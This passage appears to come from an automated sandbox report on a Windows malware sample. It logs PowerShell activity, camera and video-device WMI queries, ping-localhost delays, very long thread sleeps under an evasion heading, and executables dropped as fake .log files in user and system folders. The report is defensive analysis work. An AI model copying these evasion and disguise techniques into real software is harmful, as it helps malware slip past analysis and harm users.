                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (identical row repeated many times in the report)

                              Malware Analysis System Evasion

Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera') (identical row repeated many times in the report)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Memory allocated: 10E0000 memory reserve | memory write watch
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Memory allocated: 1AAA0000 memory reserve | memory write watch
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Memory allocated: 2380000 memory reserve | memory write watch
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Memory allocated: 1A550000 memory reserve | memory write watch
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Memory allocated: 3200000 memory reserve | memory write watch
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Memory allocated: 1B2E0000 memory reserve | memory write watch
                               Source: C:\Windows\System32\r6Lr6XbTWt.exe | Memory allocated: BB0000 memory reserve | memory write watch
                               Source: C:\Windows\System32\r6Lr6XbTWt.exe | Memory allocated: 1A6C0000 memory reserve | memory write watch
                               Source: C:\Windows\System32\r6Lr6XbTWt.exe | Memory allocated: D30000 memory reserve | memory write watch
                               Source: C:\Windows\System32\r6Lr6XbTWt.exe | Memory allocated: 1A7C0000 memory reserve | memory write watch
                               Source: C:\Recovery\0eDO5Zbs.exe | Memory allocated: 10E0000 memory reserve | memory write watch
                               Source: C:\Recovery\0eDO5Zbs.exe | Memory allocated: 1AC40000 memory reserve | memory write watch
                               Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Memory allocated: 1120000 memory reserve | memory write watch
                               Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Memory allocated: 1AC80000 memory reserve | memory write watch
                               Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Memory allocated: 14E0000 memory reserve | memory write watch
                               Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Memory allocated: 1AE40000 memory reserve | memory write watch
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Memory allocated: 1060000 memory reserve | memory write watch
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Memory allocated: 1AD90000 memory reserve | memory write watch
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Memory allocated: 1520000 memory reserve | memory write watch
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Memory allocated: 1AFA0000 memory reserve | memory write watch
                               Source: C:\Windows\System32\r6Lr6XbTWt.exe | Memory allocated: 14E0000 memory reserve | memory write watch
                               Source: C:\Windows\System32\r6Lr6XbTWt.exe | Memory allocated: 1AFB0000 memory reserve | memory write watch
                               Source: C:\Recovery\0eDO5Zbs.exe | Memory allocated: 800000 memory reserve | memory write watch
                               Source: C:\Recovery\0eDO5Zbs.exe | Memory allocated: 1A520000 memory reserve | memory write watch
                               Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Memory allocated: 1650000 memory reserve | memory write watch
                               Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Memory allocated: 1AFE0000 memory reserve | memory write watch
                               Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Memory allocated: 1240000 memory reserve | memory write watch
                               Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Memory allocated: 1AE60000 memory reserve | memory write watch
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Memory allocated: 1610000 memory reserve | memory write watch
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Memory allocated: 1B3C0000 memory reserve | memory write watch
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Memory allocated: B20000 memory reserve | memory write watch
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Memory allocated: 1A840000 memory reserve | memory write watch
                               Source: C:\Windows\System32\r6Lr6XbTWt.exe | Memory allocated: B80000 memory reserve | memory write watch
                               Source: C:\Windows\System32\r6Lr6XbTWt.exe | Memory allocated: 1A730000 memory reserve | memory write watch
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 600000
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 599891
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 599766
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 599657
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 599485
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 599370
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 599233
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 599125
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 597656
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 597519
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 597391
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 597219
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 597046
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (12 identical rows across the powershell.exe instances)
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 600000
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 599844
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 599702
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 3600000
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 598844
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 598625
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 598438
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 598110
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 597766
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 597594
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 597441
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 596766
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 596608
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 596422
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 300000
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 596297
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 596186
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 596049
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 595907
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 595772
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 595655
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 595547
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 595430
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 595329
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 595204
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 593563
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 593454
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 593329
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 593188
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 593079
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 592954
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 592829
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 592704
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 592579
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 592469
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 592357
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 592249
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 592133
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 592029
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 591870
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 591704
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 591446
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 591333
                               Source: C:\Windows\System32\r6Lr6XbTWt.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Windows\System32\r6Lr6XbTWt.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Recovery\0eDO5Zbs.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Windows\System32\r6Lr6XbTWt.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Recovery\0eDO5Zbs.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Thread delayed: delay time: 922337203685477
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Window / User API: threadDelayed 4042
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Window / User API: threadDelayed 413
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2735
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2199
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2372
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3036
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2552
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2814
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Window / User API: threadDelayed 6628
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Window / User API: threadDelayed 3044
                               Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\QCzpQABH.log
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\lkEtgbYs.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\WWtOxrLm.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\eTZddqfc.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\oiVTRNgB.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CEHidmAX.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\wMeJBGvi.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\oGDUNCaL.log
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\XOSeUCEW.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\nluLvNRG.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\NslYNyvF.log
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\dGvExiJK.log
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\LuUydMov.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\hJPUkngW.log
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\vSXJQEeZ.log
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\UdnONotd.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\NClzZRhR.log
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\NnjhOJZu.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\ezCDhkaT.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\MGxYJULN.log
                               Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\xkMJxvqs.log
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -14757395258967632s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -600000s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -599891s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -599766s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -599657s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -599485s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -599370s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -599233s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -599125s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -100000s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -99875s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -99765s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -99656s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -99547s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -99437s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -99328s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -99219s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -99094s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -98984s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -98875s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -98765s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -98656s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -597656s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -597519s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -597391s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -597219s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136 | Thread sleep time: -597046s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 6276 | Thread sleep time: -30000s >= -30000s
                               Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 4304 | Thread sleep time: -922337203685477s >= -30000s
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556 | Thread sleep count: 2735 > 30
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892 | Thread sleep time: -922337203685477s >= -30000s
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492 | Thread sleep count: 34 > 30
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800 | Thread sleep time: -922337203685477s >= -30000s
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552 | Thread sleep count: 2199 > 30
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 | Thread sleep time: -16602069666338586s >= -30000s
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808 | Thread sleep time: -922337203685477s >= -30000s
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568 | Thread sleep count: 2372 > 30
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908 | Thread sleep time: -1844674407370954s >= -30000s
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 | Thread sleep time: -922337203685477s >= -30000s
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 | Thread sleep count: 3036 > 30
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904 | Thread sleep time: -922337203685477s >= -30000s
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840 | Thread sleep time: -922337203685477s >= -30000s
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736 | Thread sleep count: 2552 > 30
                               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896 | Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep count: 2814 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 8032Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 8116Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -25825441703193356s >= -30000s
